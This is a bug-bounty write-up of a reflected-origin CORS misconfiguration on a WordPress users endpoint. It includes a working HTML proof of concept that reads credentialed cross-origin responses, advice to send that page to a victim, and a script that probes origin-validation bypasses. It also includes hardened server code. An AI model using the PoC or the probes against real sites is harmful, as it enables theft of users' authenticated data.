How I Found a CORS Vulnerability While Hunting a Website

#$ubh@nk@r
2 min readAug 13, 2023


Intro : Welcome to my new article on bug hunting. Here I will discuss how I found a CORS vulnerability while hunting a web application. Throughout, the target domain is assumed to be example.com. So let's start.

Hack it :

So I first went to the website example.com and requested the path /wp-json/wp/v2/users (the WordPress REST API endpoint that lists the site's users), which returned information about all the users. Then I intercepted the request in Burp Suite and sent it to Repeater.

Response in JSON Format

Here I first tested for CORS, i.e. whether the endpoint would grant access to an external site, because the response already carried some Access-Control-* headers.

So I added an Origin header to my request and set it to an arbitrary website:

Tip : Origin: https://evil.com

After I sent the request, the response came back with a 200 status code and the headers Access-Control-Allow-Origin: https://evil.com and Access-Control-Allow-Credentials: true. That means the server reflects whatever origin the client supplies and also allows credentials (cookies) on the cross-origin request. That combination is what breaks the same-origin policy: any site the victim visits can read this response with the victim's session attached.

The response also advertised almost every HTTP method as allowed, and its body was identical to the one returned without the Origin header.
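The check above, sending a chosen Origin and reading the Access-Control-* headers back, can be scripted. The following is an added example and not code from the original post: classifyCors() is the decision the article makes by eye in Burp, candidateOrigins() adds a few origins that catch sloppy validation beyond plain reflection, and probeOrigin() sends the request with Node's fetch. The header names are the standard CORS ones; the sample response at the bottom is constructed to mirror the one described above.

```javascript
// Added example, not code from the original post: the check the article does by
// hand in Burp, as a small Node script.

// Origins worth sending to a target. Beyond the arbitrary origin the article
// uses, these catch common "validation" mistakes: a check that only tests for
// the trusted host as a prefix or suffix, the literal "null" origin (which any
// sandboxed iframe or file:// page can send), and a scheme downgrade.
function candidateOrigins(targetUrl) {
  const host = new URL(targetUrl).hostname;
  return [
    "https://evil.com",          // arbitrary origin (the article's test)
    `https://${host}.evil.com`,  // passes a startsWith(host) check
    `https://evil${host}`,       // passes an endsWith(host) check
    "null",                      // often reflected after being added for local testing
    `http://${host}`,            // same host over http: readable from a man-in-the-middle page
  ];
}

// headers: object keyed by lower-case header name.
function classifyCors(origin, headers) {
  const acao = headers["access-control-allow-origin"];
  const creds =
    String(headers["access-control-allow-credentials"] || "").trim().toLowerCase() === "true";
  if (acao === undefined) {
    return { level: "none", reason: "no Access-Control-Allow-Origin header" };
  }
  if (acao === "*") {
    // Browsers refuse to expose a credentialed response to "*", so at most
    // anonymous content leaks, which a direct request could read anyway.
    return {
      level: "low",
      reason: "wildcard origin" + (creds ? " (credentials flag is ignored by browsers with *)" : ""),
    };
  }
  if (acao === origin) {
    return creds
      ? { level: "high", reason: "origin reflected with Access-Control-Allow-Credentials: true" }
      : { level: "low", reason: "origin reflected without credentials" };
  }
  return { level: "none", reason: `Access-Control-Allow-Origin is ${acao}` };
}

// Send one probe. fetch() is global in Node 18+; Node lets us set Origin,
// which a browser would not. redirect: "manual" keeps the headers of the
// probed URL itself rather than those of a redirect target.
async function probeOrigin(targetUrl, origin) {
  const res = await fetch(targetUrl, { headers: { Origin: origin }, redirect: "manual" });
  const headers = {};
  res.headers.forEach((value, name) => { headers[name.toLowerCase()] = value; });
  return { origin, status: res.status, ...classifyCors(origin, headers) };
}

// Constructed sample mirroring the response described in the article.
const sampleVulnerableHeaders = {
  "access-control-allow-origin": "https://evil.com",
  "access-control-allow-credentials": "true",
  "content-type": "application/json; charset=UTF-8",
};

// Usage: node cors_probe.js https://example.com/wp-json/wp/v2/users
if (process.argv[2] && process.argv[2].startsWith("http")) {
  const target = process.argv[2];
  Promise.all(candidateOrigins(target).map((o) => probeOrigin(target, o)))
    .then((results) => {
      for (const r of results) {
        console.log(`${r.level.padEnd(4)} ${r.status} ${r.origin} -> ${r.reason}`);
      }
    })
    .catch((err) => { console.error(err.message); process.exit(1); });
}
```

Only "high" is the reflected-origin-with-credentials case from the article. A wildcard is rated low even when the credentials flag is set, because browsers never expose a credentialed response to "*".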

Here is the PoC:


<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    // readyState 4 = request finished; status 200 = the browser let us read the cross-origin response
    if (this.readyState == 4 && this.status == 200) {
      // Show the stolen response in the page (textContent, so the JSON is not rendered as HTML) and pop it up.
      // alert() returns undefined, so assigning its result to innerHTML would display nothing.
      document.getElementById("demo").textContent = this.responseText;
      alert(this.responseText);
    }
  };
  // Cross-origin request to the vulnerable endpoint; replace example.com with the target
  xhttp.open("GET", "https://example.com/wp-json/wp/v2/users", true);
  // Attach the victim's cookies; the server must answer with Access-Control-Allow-Credentials: true
  // and reflect our origin for the browser to expose the response
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</center>
</body>
</html>

Host this page anywhere, set the URL to the vulnerable site, and send it to a victim. When the victim clicks Exploit, their browser makes the credentialed cross-origin request and the script reads the response, which triggers the vulnerability.

Impact :

Attackers can use CORS vulnerabilities to steal sensitive data from applications, such as API keys, SSH keys, personally identifiable information (PII), or users' credentials. The severity depends on what the affected responses contain: a misconfiguration like this one only exposes data that is returned because of the victim's cookies or session, so an endpoint that gives the same answer to an anonymous visitor leaks nothing new by itself, while the same reflected-origin policy applied to authenticated endpoints on the host is the real risk.
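For contrast, here is what the server side of a finding like this looks like next to a fixed version. This is an added example and not code from the original post or the affected site: corsHeadersReflecting() is the reflect-any-origin behaviour observed above, corsHeadersAllowlist() is the hardened decision, and serve() is a small demo server the PoC page can be pointed at. The allow-list entry https://app.example.com, the port and the JSON body are assumptions for the demo.

```javascript
// Added example, not code from the original post: the server-side origin
// decision behind a finding like this one, beside a hardened version.

// Vulnerable: echo whatever Origin the client sent and allow credentials.
// Every site the victim visits can now read the response with their cookies.
function corsHeadersReflecting(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Assumed front-end that legitimately needs credentialed cross-origin access.
const ALLOWED_ORIGINS = new Set(["https://app.example.com"]);

// Hardened: exact match on a normalized origin (scheme + host + port), never
// reflect, never allow "null", and send Vary: Origin so a shared cache cannot
// serve one origin's Access-Control-Allow-Origin to another.
function corsHeadersAllowlist(origin) {
  if (!origin) return {};
  let normalized;
  try {
    normalized = new URL(origin).origin;   // "null" or junk throws here
  } catch {
    return { Vary: "Origin" };
  }
  if (!ALLOWED_ORIGINS.has(normalized)) return { Vary: "Origin" };
  return {
    "Access-Control-Allow-Origin": normalized,
    "Access-Control-Allow-Credentials": "true",
    Vary: "Origin",
  };
}

// Demo server so the PoC page can be pointed at http://localhost:8080/.
// Run with `node cors_server.js vulnerable` or `node cors_server.js hardened`.
async function serve(port, mode) {
  const { createServer } = await import("node:http");
  const pick = mode === "vulnerable" ? corsHeadersReflecting : corsHeadersAllowlist;
  createServer((req, res) => {
    // Constructed stand-in for the users endpoint's JSON
    const body = JSON.stringify([{ id: 1, name: "admin" }]);
    res.writeHead(200, { "Content-Type": "application/json", ...pick(req.headers.origin) });
    res.end(body);
  }).listen(port, () => console.log(`${mode} CORS server listening on http://localhost:${port}/`));
}

if (process.argv[2] === "vulnerable" || process.argv[2] === "hardened") serve(8080, process.argv[2]);
```

Running the "vulnerable" mode and loading the PoC from another origin reproduces the read; switching to "hardened" makes the same PoC fail in the browser console with a CORS error, because the evil origin never receives an Access-Control-Allow-Origin header.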

THANKS FOR READING!!

If you liked it, don't forget to follow me for more articles.

Happy Hacking~



Written by #$ubh@nk@r

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/
